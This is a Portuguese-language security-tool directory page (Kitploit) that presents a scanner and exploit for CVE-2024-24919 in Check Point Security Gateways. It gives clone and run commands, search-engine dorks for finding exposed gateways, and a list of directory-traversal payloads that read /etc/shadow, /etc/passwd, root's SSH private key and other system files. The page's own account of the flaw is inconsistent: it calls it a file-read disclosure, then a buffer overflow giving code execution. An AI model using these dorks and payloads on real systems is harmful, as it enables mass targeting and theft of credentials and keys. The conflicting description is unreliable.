Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/goatsecurity/cve-2024-24919
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 exploit

Ver Repositório
2011há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Exploração de RCE em Check Point Security Gateway (CVE-2024-24919)

Visão Geral

Este repositório contém uma ferramenta para explorar a vulnerabilidade CVE-2024-24919 em Check Point Security Gateways. A ferramenta é um multi-escâner que pode identificar dispositivos vulneráveis e um exploit de alvo único que pode assumir o controle total do dispositivo afetado.

CVE-2024-24919 é uma vulnerabilidade de divulgação de informações de alta gravidade que permite a um invasor ler arquivos arbitrários remotamente em um Check Point Security Gateway. Esta vulnerabilidade pode ser explorada para roubar informações sensíveis, como senhas e arquivos de configuração.

Aviso Legal:

Esta ferramenta é fornecida apenas para fins educacionais. Não deve ser usada para atacar sistemas vulneráveis sem o consentimento explícito do proprietário. Os autores desta ferramenta não se responsabilizam por quaisquer danos que possam resultar do seu uso.

Como funciona

O exploit funciona enviando uma solicitação HTTP especialmente criada para o dispositivo vulnerável. A solicitação desencadeia um estouro de buffer no firmware do dispositivo, o que permite ao invasor executar código arbitrário. O exploit pode então ser usado para assumir o controle total do dispositivo.

Requisitos

  • Python 3
  • colorama
  • requests

Instalação

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Uso

Você pode escanear um único alvo ou múltiplos!

root@kitploit:~
python cve-2024-24919.py

Dorks

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

Captura de Tela da Ferramenta

ss

$ Caminhos da ferramenta : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
Baixar ferramenta